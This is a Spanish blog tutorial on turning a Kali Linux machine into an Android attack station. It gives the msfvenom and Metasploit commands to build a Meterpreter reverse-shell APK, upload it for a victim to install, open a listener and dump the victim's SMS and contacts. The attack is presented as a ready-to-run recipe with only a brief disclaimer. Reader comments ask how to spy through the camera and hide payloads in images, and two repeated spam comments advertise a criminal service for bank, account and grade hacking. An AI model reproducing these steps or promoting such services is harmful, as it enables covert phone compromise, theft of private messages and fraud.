:::: MENU ::::
  • Aprende a usar Kali Linux!

  • Usos del Metasploit!

  • Hacking Ético

martes, 14 de junio de 2016

Antes, para ver esta guía sin conexión puedes descargarla desde aquí para leerla en cualquier dispositivo compatible con Microsoft Word sin conexión a Internet: http://ouo.io/EPokCW

Este tutorial se encuentra en Video!. Puedes dar click aquí para verlo.

Sino pues continua leyendo.

Sin duda el Smartphone lo tenemos en el día a día, de hecho se podría decir que hasta nos hemos hecho dependientes del mismo.
Esta es una de las cosas que los Hackers de Sombrero Negro (Llamados Crackers) lo saben y lo entienden muy bien, por eso es necesario saber qué hacer para cuidarnos de ataques de los mismos, la mejor forma de aprender a defenderse es saber cómo actúan, como piensan sus fechorías.
En este Blog iremos aprendiendo solo un poco de lo que los Crackers pueden realizar a desprevenidos consumidores e iremos aprendiendo cómo evitar caer en sus trampas.
A continuación veremos que con Kali Linux una distribución basada en Debian GNU/Linux, se puede acceder a los Smartphones de las personas, en este caso a un Smartphone Android. 
1. Encender Kali Linux en una máquina Virtual o en tu PC.
Podemos utilizar una máquina virtual como VirtualBox o bien bootear una memoria usb y ubicarle la imagen ISO de Kali Linux.
2. Abrir una Consola de Kali Linux.
Para esto podemos irnos al icono negro de consola en la parte izquierda como muestra la Imagen.
3. Elegimos método y Payload.
Aquí estaremos eligiendo cuál es el Payload que usaremos para realizar el ataque con Metasploit, en este caso utilizaremos:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=7000

msfvenom: Indicará que utilizaremos Metasploit para el ataque.
-p: Indica a msfvenom que utilizaremos un payload.
android/meterpreter/reverse_tcp: Utilizaremos meterpreter por medio de una conexión reversa, esto quiere decir que es el dispositivo vícima el que abrirá con nosotros una sesión en Meterpreter.
lhost: Indica el host del "Virus", en este caso indicamos nuestra IP privada, la que nos da el Router para identificarnos dentro del host.
lport: Es el puerto que utilizaremos para el ataque, intentar no utilizar puertos normalmente usados como 80,4444, ya que puede estar siendo utilizado.
Para saber cual es la ip que ubicaremos en lhost podemos abrir otra terminal y ubicar el comando:

ifconfig



4. Elegimos la ruta del "Virus".
En este caso lo ubicaremos en el Escritorio con:

R > /root/Desktop/Nombredelarchivo.apk

Muchas veces dependiendo del idioma del Kali Linux, la ruta puede cambiar, por ejemplo, en lugar de ubicar "Desktop" se debe ubicar "Escritorio". De esta forma tendremos completo el comando que debemos ejecutar:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=7000 R > /root/Desktop/AplicacionVirus.apk

5. Ejecutar.
Presionar ENTER para crear el archivo APK, este quedará obviamente en la carpeta que hayamos tecleado. Como muestra a continuación el archivo está en Escritorio.
6. Subimos el archivo.
Podemos subir el archivo a la nube, o a alguna página de descargas, en este caso lo subí a Mega, de aquí se trata de hacer que la víctima se descargue el apk que hemos creado y la ejecute, pero eso será luego.
7. Abrir la consola Metasploit.
Para eso utilizaremos el comando:

msfconsole

De esta manera tendremos la consola abierta.
8. Usar el Handler y preparar Exploit.
Abrimos el Handler de escucha, esto esperará que la victima se conecte a nosotros, para eso usamos el comando:

use exploit/multi/handler


9. Set los parámetros que va a escuchar el Handler.
En este caso vamos a ubicarle los parámetros que el Handler en Metasploit estará esperando (Escuchando), por tanto daremos los parámetros que ubicamos en el archivo virus que creamos anteriormente.
Los comandos son los siguientes:

set PAYLOAD android/meterpreter/reverse_tcp
set lhost 192.168.1.2
set lport 7000

Y luego comprobamos que todo esté bien tecleado con el comando:

show options

Se guian con la imagen que sigue.
10. Iniciar el Exploit.
Para eso usamos el comando:

exploit

De esta manera estaremos en escucha y espera a que nuestra víctima abra la aplicación maliciosa.
11. Obtener contactos y mensajes del smartphone.
Cuando el Smartphone abra la aplicación (Obviamente tú y el Smartphone tienen que tener conexión a Internet y estar dentro de la misma red LAN), se mostrará que se a abierto una sesión en Meterpreter.
Ahora con los comandos siguientes podremos obtener un archivo text de los mensajes y de los contactos del smartphone.

dump_sms
dump_contacts


Entonces al realizar los comando obtendremos archivos text que se guardaran en la carpeta Home del sistema (A esta se accede directamente del escritorio dando click en el icono de carpeta al lado derecho). Estos archivos contendrán los mensajes de texto enviados y recibidos del smartphone víctima así como sus contactos personales.

12. Salir de consolas.

Ahora puedes salir de las consolas, bien cerrando sesión con exit o cerrando la ventana del Metasploit, o explorar otras opciones.

Terminado!


Ahora ya sabes como los que usan Kali Linux pueden realizar este tipo de ataques y obtener tu información, por lo tanto la pregunta:
¿Cómo nos podemos proteger de estos ataques?
* No descargar aplicaciones dudosas.
* No instalar aplicaciones de sitios de dudosa reputación.
* Leer atentamente los permisos que se le dan a las aplicaciones.
* Tener un buen suit de protección de Android (Firewalls, Antivirus etc...)

IMPORTANTE!

* Todo lo anteriormente hecho se a realizado bajo un régimen cuidadosamente diseñado, se a atacado a mi smartphone y nadie a sido víctima del ataque, además de haberse realizado dentro de la Red LAN.
* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

- Cuculmeca

20 comentarios:

  1. Buenas, lo he intentado y no salta el meterpreter, cuando tecleo ifconfig para saber la ip, a mi no me aparece wlan, solo me aparece eth0 y lo , he probado con la direccion ip de eth0 pero aunque haya instalado el virus en el movil no salta el meterpreter... ¿¿alguna solución?? Gracias

    ResponderEliminar
    Respuestas
    1. te falta mucho por configurar

      Eliminar
    2. solucionaste eso? hay alguna guia para configurar eso ?

      Eliminar
    3. me imagino que lo virtualisaste con VirtualBox... si tienes Internet, aun que no te permite ver el wlan entonces todo esta bien, pero antes de correr tu OS Kalini Linux activa en la configuración de VirtualBox en Red, activa que en lugar de utilizar tu eternet, haga un punte, entonces ya en Kali toma el ip que aparece en al parte de eth0... esto sucede por que VirtualBox crea un "cable virtual" como si estuvieras conectado con una cable ehternet.

      Eliminar
    4. Si lo tienes en una máquina virtual está no puede leer la tarjeta de red del computador así que no puedes tener acceso a internet (wlan0) a menos que instales kali en un live usb o comprar un adaptador de wifi usb y configurarlo en la maquina virtual en lo personal yo tengo linux en dual boot con Windows y me va de maravilla

      Eliminar
  2. Jjajajjaj pero es lo mismo que nada, ya que hay que hacer ingenieria social para que la otra persona habra el archivo no tiene gracias, mejor seria utilizar un exploit sobre alguna aplicacion para tomar el shell del dispositivo y desde ahi cargarle el apk, tu manera no esta mal pero no es optima cuando la otra persona desconfia de las apk que le llegan. Saludos Hackescor Cobra.

    ResponderEliminar
    Respuestas
    1. De hecho ya hice el post de introducir el código de Metasploit en una aplicación normal. :)
      Hago post divididos, puesto que así es mas ordenado.

      Eliminar
  3. te quiero tioooo, me cago en la puta he mirado millones de tutoriales y nada de nada, con el tuyo lo he conseguido a la primerisimaaa jajaj lo he intentado con mi movil y perfecto. solo una cosa mas makina.
    quiero tomar fotos y videos, ¿como se hace eso?
    muchisimos millones de gracias tio.

    ResponderEliminar
    Respuestas
    1. Por aquí en el blog hay un post que dice como ver en tiempo real la cámara de el celular infectado y tomar fotos.

      Saludos y gracias! jaja

      Eliminar
  4. Muy buen post pero... ¿Como puedo ver los dispositivos que ya han instalado el apk y están en la misma red? Una vez que desconectan, cuando vuelven a conectar no sé como verlos

    ResponderEliminar
  5. Para hacerlo con una red ajena utilizaria mi ip publica verdad?

    ResponderEliminar
  6. como no sabemos que nos estas hackeando al leer esta pagina

    ResponderEliminar
  7. hola tengo un problema y es que cuando ya ejecuto el exploit y se conecta el apk no me sale meterpreter>

    ResponderEliminar
    Respuestas
    1. Algunos celulares, al oscurecer la panalla desactivan las aplicaciones en segundo plano que no estan autorizadas a funcionar, revisa que la apk crada tenga los permisos en segundo plano

      Eliminar
  8. ¡Tus artículos son geniales! Bastante informativos y explicas todo con detalle.
    Mientras más mejoras veo en Android menos ganas tengo de usar otro sistema operativo o smartphone.

    ResponderEliminar
  9. Hay manera aplicable en la que el virus no sea mediante una apk, sino por una imagen, archivo de sonido o word que no sean detectables?, es fecir, si lo envio por whatssap que al momento de llegar un receptor lo abra ya esté infectado sin que se de cuenta?

    ResponderEliminar
  10. hoy en dia de lo mas importante que se quiere aprender a Hackear WhatsApp

    ResponderEliminar
  11. Como obtengo la ip publica de la red a la cual esta conectada el smartphone a traves de meterpreter

    ResponderEliminar
  12. Finalmente, encontré algunos hackers profesionales que me alegraron y suplieron mis necesidades a largo plazo, piratearon la base de datos de mi universidad y actualizaron mis resultados.
    También me ayudaron a entrar en una cuenta de Facebook y también me ayudaron a entrar en la cuenta bancaria de mi amigo e hicieron algunas transferencias por mí.
    puede contactarlos en: DARKWEBHACKRS20@GMAIL.COM
    whatsapp: +447727710235

    Son legendarios y brindan soluciones en:
    * Hack general de redes sociales, por ejemplo, Facebook, Instagram, Twitter, Skype
    * Cambia y actualiza el grado universitario
    * Hackear notas y transcripciones de la Universidad
    * Borrar antecedentes penales
    * Piratería general y penetración de bases de datos
    * Cuentas de PayPal verificadas piratería
    * Hackear todas las cuentas de redes sociales
    * Hackear todos los dispositivos Android, iPhone y Windows Mobile
    * puntaje de crédito claro
    * Aumenta Facebook, seguidores y me gusta de Instagram
    * Cortar cuentas bancarias
    * piratear cuentas de correo electrónico
    * Sitio web bloqueado por hackers
    * ayuda Regístrate en ILLUMINATI y hazte famoso más rápido
    * eliminar videos de YouTube o aumentar las vistas
    * transferencia escolar y falsificación de certificados
    * Recuperación de archivos o documentos perdidos
    * piratería de todos los datos bancarios y piratas informáticos de tarjetas de crédito
    * carga de bitcoin y multiplicación de monedas
    y otros tipos de hackers.

    contáctelos en: DARKWEBHACKRS20@GMAIL.COM
    whatsapp: +447727710235
    para que puedas sonreír de nuevo ...

    ResponderEliminar
  13. Finalmente, encontré algunos hackers profesionales que me alegraron y suplieron mis necesidades a largo plazo, piratearon la base de datos de mi universidad y actualizaron mis resultados.
    También me ayudaron a entrar en una cuenta de Facebook y también me ayudaron a entrar en la cuenta bancaria de mi amigo e hicieron algunas transferencias por mí.
    puede contactarlos en: DARKWEBHACKRS20@GMAIL.COM
    whatsapp: +447727710235

    Son legendarios y brindan soluciones en:
    * Hack general de redes sociales, por ejemplo, Facebook, Instagram, Twitter, Skype
    * Cambia y actualiza el grado universitario
    * Hackear notas y transcripciones de la Universidad
    * Borrar antecedentes penales
    * Piratería general y penetración de bases de datos
    * Cuentas de PayPal verificadas piratería
    * Hackear todas las cuentas de redes sociales
    * Hackear todos los dispositivos Android, iPhone y Windows Mobile
    * puntaje de crédito claro
    * Aumenta Facebook, seguidores y me gusta de Instagram
    * Cortar cuentas bancarias
    * piratear cuentas de correo electrónico
    * Sitio web bloqueado por hackers
    * ayuda Regístrate en ILLUMINATI y hazte famoso más rápido
    * eliminar videos de YouTube o aumentar las vistas
    * transferencia escolar y falsificación de certificados
    * Recuperación de archivos o documentos perdidos
    * piratería de todos los datos bancarios y piratas informáticos de tarjetas de crédito
    * carga de bitcoin y multiplicación de monedas
    y otros tipos de hackers.

    contáctelos en: DARKWEBHACKRS20@GMAIL.COM
    whatsapp: +447727710235

    ResponderEliminar

A call-to-action text Contact us